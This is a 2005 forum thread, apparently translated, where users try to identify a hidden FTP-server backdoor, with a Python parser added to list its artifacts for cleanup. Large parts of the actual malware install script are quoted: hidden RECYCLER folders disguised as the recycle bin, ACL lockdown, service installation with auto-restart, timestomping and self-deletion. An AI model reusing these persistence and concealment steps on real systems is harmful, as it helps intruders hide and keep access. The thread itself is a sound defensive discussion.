echo y|caclsENG "y:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=Y:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:diskz
if not exist "z:\" (goto install)
if not exist "z:\RECYCLER" mkdir "z:\RECYCLER" | attrib "z:\RECYCLER" +s +h
if exist "z:\RECYCLER" mkdir "z:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>z:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>z:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "z:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "z:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "z:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "z:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=Z:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:install
"%systemroot%\system32\TskMan.exe" -install
settimedate "%systemroot%\system32\TskMan.exe"
settimedate "%systemroot%\system32\chkdrv.vxd"
settimedate "%systemroot%\system32\carun.ocx"
settimedate "%systemroot%\system32\carun.dll"
del settimedate.exe
del caclsENG.exe
echo REGEDIT4>temp.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TskMan]>>temp.reg
echo "FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,52,00,4f,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00>>temp.reg
regedit /s temp.reg
del temp.reg
net start TskMan
del kit.exe
del install.cmd
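An added triage example, not part of the thread: a small Python parser that turns an install script like the one posted above into a checklist of artifacts to verify on the host (dropped files, hidden directories, ACL changes, service names). The function names are hypothetical, and SAMPLE is a shortened excerpt constructed from the posted script.

```python
import re

# Shortened excerpt constructed from the install script posted above.
SAMPLE = r'''
move carun.ocx "%systemroot%\system32\carun.ocx"
move TskMan.exe "%systemroot%\system32\TskMan.exe"
:diskc
if not exist "c:\" (goto diskd)
if not exist "c:\RECYCLER" mkdir "c:\RECYCLER" | attrib "c:\RECYCLER" +s +h
if exist "c:\RECYCLER" mkdir "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo y|caclsENG "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
:install
"%systemroot%\system32\TskMan.exe" -install
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TskMan]>>temp.reg
net start TskMan
del install.cmd
'''

# Leading 'if [not] exist "path"' guards (possibly chained) before the real command.
IF_GUARD = re.compile(r'^(?:if\s+(?:not\s+)?exist\s+"[^"]*"\s+)+', re.I)
# Service name inside a registry key header echoed into a .reg file.
SERVICE_KEY = re.compile(r'\\Services\\([^\]\\]+)\]', re.I)
QUOTED = re.compile(r'"([^"]+)"')

KINDS = ("dropped_files", "directories", "hidden_paths",
         "acl_changes", "services", "service_installers", "self_deleted")


def split_pipeline(line):
    """Split a cmd.exe line on '|' characters that sit outside double quotes."""
    parts, buf, quoted = [], [], False
    for ch in line:
        if ch == '"':
            quoted = not quoted
        if ch == '|' and not quoted:
            parts.append(''.join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    parts.append(''.join(buf).strip())
    return [p for p in parts if p]


def extract_artifacts(script):
    """Return a dict of de-duplicated artifacts, in order of first appearance."""
    found = {kind: [] for kind in KINDS}

    def add(kind, value):
        if value and value not in found[kind]:
            found[kind].append(value)

    for raw in script.splitlines():
        for cmd in split_pipeline(raw.strip()):
            cmd = IF_GUARD.sub("", cmd)          # look past existence guards
            words = cmd.split()
            if not words:
                continue
            verb = words[0].lower()
            lowered = [w.lower() for w in words]
            paths = QUOTED.findall(cmd)
            if verb == "move" and paths:
                add("dropped_files", paths[-1])   # destination is the quoted argument
            elif verb in ("mkdir", "md") and paths:
                add("directories", paths[0])
            elif verb == "attrib" and paths and "+h" in lowered:
                add("hidden_paths", paths[0])
            elif verb.startswith("cacls") and paths:
                # Covers renamed copies such as caclsENG; keep what follows /G.
                grants = words[lowered.index("/g") + 1:] if "/g" in lowered else []
                add("acl_changes", (paths[0], " ".join(grants)))
            elif verb == "echo":
                match = SERVICE_KEY.search(cmd)
                if match:
                    add("services", match.group(1))
            elif verb == "net" and len(words) >= 3 and lowered[1] == "start":
                add("services", words[2])
            elif verb == "del" and len(words) >= 2:
                add("self_deleted", words[1])
            elif verb.startswith('"') and "-install" in lowered[1:] and paths:
                add("service_installers", paths[0])
    return found


if __name__ == "__main__":
    for kind, values in extract_artifacts(SAMPLE).items():
        print(kind)
        for value in values:
            print("   ", value)
```

Run against the full script, the `services` and `dropped_files` lists give the names to look for from a clean boot environment, where a hidden process cannot filter the results.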
Guest Slettet+432, posted 15 February 2005: Are you sure it's this file, then? I can't see anything that could resemble an FTP server..
TCi, posted 15 February 2005: That was quite a file... an awful lot of if statements there. Not that I'm experienced with this, but it does look like some kind of FTP server setup to me, at least.
move logon.txt "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logonoop.txt"
move logoff.txt "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logoffoop.txt"
move change.txt "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\changeoop.txt"
echo y|caclsENG "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
franksun (thread author), posted 15 February 2005: Yes, and I have changed ownership and deleted that, but the server is still there.
TCi, posted 15 February 2005: "Yes, and I have changed ownership and deleted that, but the server is still there." Choose the detailed view in the folders you check and sort them by when they were created etc.; maybe that helps with finding out which files the server uses...
Zethyr, posted 15 February 2005 (edited 15 February 2005 by Zethyr): What does 'carun.ocx' actually do?? And what do the attributes -s and -h do??